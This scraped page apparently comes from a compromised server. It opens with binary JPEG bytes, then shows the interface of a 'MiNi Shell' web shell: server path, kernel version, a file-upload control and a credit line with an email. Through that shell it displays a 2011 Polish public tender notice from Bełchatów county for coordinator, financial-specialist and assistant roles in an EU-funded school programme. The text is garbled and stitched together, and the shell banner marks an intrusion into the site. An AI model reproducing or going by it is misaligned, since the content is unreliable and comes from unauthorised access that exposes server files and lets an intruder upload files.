JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110421/87294-N-2011.html

<p class="kh_header"><b>Bełchatów: ZARADNI I AKTYWNI - INTERDYSCYPLINARNY PRAOGRAM ODDZIAŁYWAŃ POZALEKCYJNYCH DLA UCZNIÓW SPECJALNEGO OŚRODKA SZKOLNO - WYCHOWAWCZEGO W BEŁCHATOWIE W RAMACH  PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI WSPOŁFINANSOWANEGO ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO  Zadanie 1. Pełnienie Funkcji Koordynatora Projektu
Zadanie 2. Pełnienie Funkcji Specjalisty ds. Finansowych
Zadanie 3. Pełnienie Funkcji Asystenta Koordynatora</b><br>
<b>Numer ogłoszenia: 87294 - 2011; data zamieszczenia: 21.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Bełchatowie , ul. Pabianicka 17/19, 97-400 Bełchatów, woj. łódzkie, tel. 044 6358600, faks 044 6358617.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-belchatowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZARADNI I AKTYWNI - INTERDYSCYPLINARNY PRAOGRAM ODDZIAŁYWAŃ POZALEKCYJNYCH DLA UCZNIÓW SPECJALNEGO OŚRODKA SZKOLNO - WYCHOWAWCZEGO W BEŁCHATOWIE W RAMACH  PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI WSPOŁFINANSOWANEGO ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO  Zadanie 1. Pełnienie Funkcji Koordynatora Projektu
Zadanie 2. Pełnienie Funkcji Specjalisty ds. Finansowych
Zadanie 3. Pełnienie Funkcji Asystenta Koordynatora.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE 1. - Pełnienie Funkcji Koordynatora Projektu
ZADANIE 2. - Pełnienie Funkcji Specjalisty ds. Finansowych  
ZADANIE 3. - Pełnienie Funkcji Asystenta Koordynatora
w ramach projektu Zaradni i Aktywni - interdyscyplinarny program oddziaływań pozalekcyjnych dla uczniów Specjalnego Ośrodka Szkolno - Wychowawczego                             w Bełchatowie w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego                ze środków Europejskiego Funduszu Społecznego. Nr konkursu POKL/II/9.1.2/09   w ramach Projektu: IX. Rozwój wykształcenia i kompetencji w regionach. Działania: 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty. Poddziałania: 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.21.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie uznany za spełniony jeżeli wykonawca przedłoży oświadczenie z art. 44 P.z.p. (złącznik nr 1 do formularza oferty).Ocena spełnienia warunków odbywać się będzie na zasadzie: spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą załączników oraz dokumentów, o których mowa  dla zadania 1 w pkt. V.1.-V.2. SIWZ,  dla zadania 2 w pkt.  V.3. - V.4. SIWZ  lub dla zadania 3 w pkt. V.5.-V.6. SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie uznany za spełniony jeżeli wykonawca przedłoży oświadczenie z art. 44 P.z.p. (złącznik nr 1 do formularza oferty).Ocena spełnienia warunków odbywać się będzie na zasadzie: spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą załączników oraz dokumentów, o których mowa  dla zadania 1 w pkt. V.1.-V.2. SIWZ,  dla zadania 2 w pkt.  V.3. - V.4. SIWZ  lub dla zadania 3 w pkt. V.5.-V.6. SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty dla Koordynatora Projektu - wypełniony i podpisany przez Wykonawcę - załącznik nr 1  do SIWZ, wraz z podpisanymi załącznikami:
V.1.1. Załącznik Nr 1 -  oświadczenie o spełnianiu warunków udziału w postępowaniu              i o braku podstaw do wykluczenia z postępowania. 
V.1.2. Załącznik  Nr 2 - kwestionariusz osobowy   - Koordynator Projektu  - z oświadczeniem o wyrażeniu zgody na przetwarzanie danych w celach rekrutacji zgodnie z ustawa o ochronie danych osobowych.
N.1.3. Załącznik  Nr 3 - oświadczenie Zleceniobiorców, osób fizycznych nie prowadzących   działalności gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszystkie  istotne dla stron postanowienia umowy wraz z wysokością kar umownych               z tytułu niewykonania lub nienależytego wykonania umowy oraz ze szczegółowym zakresem obowiązków Wykonawcy związanych z realizacją przedmiotu zamówienia zawarte zostały we wzorach umów (Załącznik do 2 lub 3 lub 4 do SIWZ - istotne postanowienia  umów).
2. Wykonawca akceptuje treść wzoru umowy na wykonanie przedmiotu zamówienia stanowiący  załącznik  2 lub 3 lub 4  do niniejszej SIWZ, oświadczeniem zawartym w treści formularza ofertowego. Postanowienia umowy ustalone we wzorze nie podlegają zmianie przez Wykonawcę. Przyjęcie przez Wykonawcę postanowień wzoru umowy stanowi jeden                      z warunków ważności oferty.
3. Zmiana Umowy po jej zawarciu jest dopuszczalna, o ile nie jest zmianą Umowy                          w stosunku do treści oferty złożonej przez Wykonawcę.
4. Wszelkie zmiany Umowy pod rygorem nieważności wymagają formy pisemnej. 
5. Zamawiający przewiduje zmiany umowy w formie pisemnej - aneksem zaakceptowanym przez obie strony w następujących  przypadkach:1)Jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji umowy,
2)Jeżeli zajdzie konieczność zmiany okresu realizacji Projektu, stosownie do zmian harmonogramu rzeczowo - finansowego. Termin realizacji umowy ulega zmianie wraz ze zmianą okresu realizacji Projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.e-bip.pl/start/46<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Bełchatowie ul. Czapliniecka 96 - Wydział Promocji i Rozwoju Powiatu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2011 godzina 10:00, miejsce: Starostwo Powiatowe w Bełchatowie ul. Pabianicka 17/19
sekretariat -III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> środki finansowe W RAMACH  PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI WSPOŁFINANSOWANEGO ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1. Pełnienie Funkcji Koordynatora Projektu
w ramach projektu:
ZARADNI I AKTYWNI - INTERDYSCYPLINARNY PRAOGRAM ODDZIAŁYWAŃ POZALEKCYJNYCH DLA UCZNIÓW SPECJALNEGO OŚRODKA SZKOLNO - WYCHOWAWCZEGO W BEŁCHATOWIE  W RAMACH  PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI WSPOŁFINANSOWANEGO ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> III.2.  ZADANIE 1.
Przedmiotem zamówienia jest pełnienie funkcji Koordynatora Projektu, który jest zobowiązany do prowadzenia i realizacji Projektu zgodnie z umową o dofinansowanie               Nr UDA-POKL.09.01.02-10-489/09-00 zawartą w oparciu o wniosek POKL/II/9.1.2/09,                           a szczególności do:
1)Terminowego i właściwego realizowania całości projektu, w szczególności                              za zarządzanie przedsięwzięciem na wszystkich jego etapach.
2)Kierowania i koordynowania pracami członków zespołu zarządzającego (Asystenta Koordynatora, Specjalisty ds. Finansowych, Specjalisty ds. Ewaluacji i Specjalisty                    ds. Promocji) poprzez podział obowiązków, delegowanie odpowiedzialności rozliczanie            z wykonanych prac.
3)Prowadzenia Biura Projektu, zwoływania i uczestniczenia w zebraniach zespołu zarządzającego.
4)Kierowania realizacją projektu w formie nadzoru merytorycznego i technicznego zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz wnioskiem aplikacyjnym oraz przepisami krajowymi i Unii Europejskiej. 
5)Nadzorowania całości prowadzonych prac w zakresie zgodności z zapisami zawartymi we wniosku, w tym budżetem i harmonogramem oraz prowadzenie bieżącego nadzoru nad realizacją projektu.
6)Koordynowania  działań merytorycznych i logistycznych związanych z projektem.
7)Przygotowywania i dokonywania zakupów w ramach realizacji projektu zgodnie                     z zasadą konkurencyjności. Kontrola merytoryczna wydatków.
8)Utrzymywanie stałych kontaktów z opiekunem projektu w Instytucji Pośredniczącej, informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów.   
9)Sporządzanie we współpracy ze Specjalistą ds. Finansowych wniosków o płatność                 w aktualnej wersji generatora wraz z załącznikami.
10) Przygotowywania ewentualnych propozycji zmian harmonogramu rzeczowo - finansowego w przypadku takiej konieczności, rozliczeń  okresowych i rozliczenia końcowego Projektu.
11)Udzielania informacji i wyjaśnień w zakresie realizacji Projektu oraz bezpośredniej współpracy z Dyrektorem i Głównej księgowej SOS-W w Bełchatowie oraz służbami finansowymi  i nadzorującymi Starostwa Powiatowego w Bełchatowie, Instytucji Pośredniczącej, a także instytucjami uprawnionymi do kontroli Projektu.
12)Udziału w kontrolach dokonywanych w ramach realizacji projektu przez uprawnione instytucje. 
13)Przygotowywania i koordynacji korespondencji związanej z projektem do Instytucji Pośredniczącej, Starostwa Powiatowego w Bełchatowie, instytucji kontrolujących.
14)Nadzoru nad gromadzeniem i archiwizacją dokumentacji związanej z realizacją projektu.
15)Zapewnienia prawidłowego obiegu informacji pomiędzy wszystkimi instytucjami, komórkami i osobami uprawnionymi do ich otrzymywania. 
16)Dokonywania uzupełnień, wyjaśnień, poprawek w dokumentach rozliczeniowych                 do czasu ostatecznego zaakceptowania rozliczenia (sprawozdania) końcowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.24.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2. Pełnienie Funkcji Specjalisty ds. Finansowych

w ramach projektu:
ZARADNI I AKTYWNI - INTERDYSCYPLINARNY PRAOGRAM ODDZIAŁYWAŃ POZALEKCYJNYCH DLA UCZNIÓW SPECJALNEGO OŚRODKA SZKOLNO - WYCHOWAWCZEGO W BEŁCHATOWIE  W RAMACH  PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI WSPOŁFINANSOWANEGO ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> III.2.  ZADANIE 2.
Przedmiotem zamówienia jest  pełnienie Funkcji Specjalisty ds. Finansowych, który jest zobowiązany do rozliczania i monitorowania wydatków dokonywanych w ramach Projektu zgodnie z umową o dofinansowanie Nr UDA-PoKL.09.01.02-10-489/09-00 zawartą                       w oparciu o wniosek POKL/II/9.1.2/09,  a szczególności do:
1.Wspierania działań Koordynatora Projektu w aspekcie księgowym, w odniesieniu do poszczególnych zadań objętych projektem, a także okresowego dokonywania przeglądów realizacji projektu.
2.Przygotowywania we współpracy z Koordynatorem projektu harmonogramu płatności wg zasad określonych w dokumentach programowych oraz wniosków o płatność                      w części dotyczącej wydatków, w tym końcowego wniosku o płatność w aktualnej wersji generatora wniosków.
3.Rozliczanie transz finansowych, zgodnie z obowiązującą umową dotacyjną, przepisami prawa oraz wytycznymi.
4.Prowadzenia odrębnej ewidencji wydatków projektu zgodnie z obowiązującymi przepisami finansowymi oraz zasadami kwalifikowalności wydatków. 
5.Odpowiedniego oznaczania i opisywania dokumentów finansowych związanych                      z realizacją projektu, zgodnie z umową dotacyjną, przepisami prawa i aktualnymi wytycznymi.
6.Rejestracji faktur i rachunków wpływających  oraz ich kontroli formalno - rachunkowej. 
7.Kontroli poprawności dokonanej klasyfikacji dokumentów z uwagi na: nazwę projektu, kwotę wynikającą z budżetu projektu a wielkością zrealizowaną, źródło finansowania, pozycje budżetowe projektów, podział na wydatki kwalifikowane, kategorie dodatkowe (zależnie od potrzeb projektu) zgodnie z obowiązującymi w tym zakresie przepisami.
8.Dokonywania kontroli księgowania kosztów projektu pod kątem spełnienia kryteriów dla tzw. wydatków kwalifikowanych, a w szczególności sprawdzenia czy są: konieczne dla wykonania zadań określonych projektem; związane z finansowaniem umów zawartych przez zamawiającego w celu osiągnięcia zadań wynikających z opisu projektu i są związane z realizacją projektu; udokumentowane odpowiednimi i prawidłowo sporządzonymi dokumentami źródłowymi.
9.Nadzoru nad prawidłowością dokonywanych płatności dla wykonawców. 
10.Współpracy w zakresie księgowania wydatków i realizacji płatności projektu                         z dyrektorem i Główną Księgową SOS-W w Bełchatowie, Wydziałem Finansowo- Księgowym Starostwa Powiatowego w Bełchatowie, Instytucją Pośredniczącą oraz instytucjami kontrolującymi.
11.Gromadzenia i archiwizacji dokumentacji dotyczącej sposobu wydatkowania środków oraz kontroli jej poprawności zgodnie z umową dotacyjną, przepisami prawa                          i wytycznymi oraz przekazanie jej Zamawiającemu.
12.Comiesięcznej kontroli zgodności bilansu finansowanego projektu, wykonana w oparciu
o zapisy księgowe.
13.Sporządzania zestawień dokumentów rozliczeniowych przedstawiających wykorzystanie środków realizowanego projektu. 
14.Przygotowywania raportów o finansowym postępie w realizacji projektu. 
15.Zapobiegania powstawaniu nieprawidłowości finansowych i raportowanie ich wystąpienia. 
16.Dokonywania uzupełnień, wyjaśnień, poprawek w dokumentach rozliczeniowych do czasu ostatecznego zaakceptowania rozliczenia (sprawozdania) końcowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3. Pełnienie Funkcji Asystenta Koordynatora
w ramach projektu:
ZARADNI I AKTYWNI - INTERDYSCYPLINARNY PRAOGRAM ODDZIAŁYWAŃ POZALEKCYJNYCH DLA UCZNIÓW SPECJALNEGO OŚRODKA SZKOLNO - WYCHOWAWCZEGO W BEŁCHATOWIE  W RAMACH  PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI WSPOŁFINANSOWANEGO ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> III.3.  ZADANIE 3.
Przedmiotem zamówienia jest pełnienie funkcji Asystenta Koordynatora, który jest zobowiązany do nadzoru nad rekrutacją uczestników i oraz organizowaniem zajęć w ramach Projektu zgodnej  z umową o dofinansowanie Nr UDA-POKL.09.01.02-10-489/09-00 zawartą w oparciu o wniosek POKL/II/9.1.2/09, a szczególności do:
1.Terminowej i właściwej rekrutacji uczestników projektu we współpracy z pedagogiem            i psychologiem Ośrodka  i wychowawcami klas zgodnie ze złożonym wnioskiem                  o dofinansowanie.
2.Współpraca z pozostałymi członkami zespołu oraz innymi uczestnikami projektu w celu właściwej realizacji Projektu.
3.Prowadzenia bazy uczestników Projektu zgodnie z przepisami ustawy  z dnia 29 sierpnia 1997 r. o ochronie danych osobowych, Rozporządzenia MSW i A  z dnia 29 kwietnia  2004 r. w sprawie  dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych oraz  zapisami § 22 umowy o dofinansowanie Nr UDA-POKL.09.01.02-10-489/09-00, w szczególności:
a.zabezpieczeniu zbiorów danych, przed rozpoczęciem ich przetwarzania, zgodnie z art. 36-39 ustawy o ochronie danych osobowych,
b.odbierania oświadczeń od uczestników o wyrażeniu zgody na przetwarzanie ich danych osobowych zgodnie ze wzorem oświadczenia stanowiącego załącznik do umowy o dofinansowanie,
c.zabezpieczenia, przetwarzania i przechowywania danych osobowych uczestników zgodnie z obowiązującymi przepisami,
d.przetwarzania danych osobowych w systemie informatycznym przekazanym przez Instytucje Pośredniczącą.
4.Organizacji i nadzoru  nad zajęciami organizowanymi dla uczestników Projektu zgodnie z umową i wnioskiem o dofinansowanie.
5.Prowadzenia Biura Projektu.
6.Współpracy z Koordynatorem Projektu oraz pozostałymi członkami zespołu  w celu właściwej realizacji Projektu.
7.Prowadzenia i archiwizację korespondencji i dokumentacji wytwarzanej w ramach realizacji własnych zadań.
8.Archiwizacji korespondencji i dokumentacji przekazanej przez pozostałych członków zespołu w ramach realizacji projektu (z wyłączeniem dokumentacji księgowej).
9.Przygotowywania i rejestracji certyfikatów udziału w projekcie dla jego uczestników. 
10.Współpracy ze Specjalista ds. Promocji  w zakresie organizowanych przedsięwzięć  promocyjnych.
11.Współpracy ze Specjalistą ds. Ewaluacji w zakresie przeprowadzanych działań ewaluacyjnych.
12.Prowadzenia niezbędnej dokumentacji oraz jej uzupełnianie i poprawianie zgodnie                         z zaleceniami Instytucji uprawnionych do nadzoru i kontroli w ramach realizowanego projektu.
13.Udziału w kontrolach w zakresie realizowanych przez siebie zadań..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com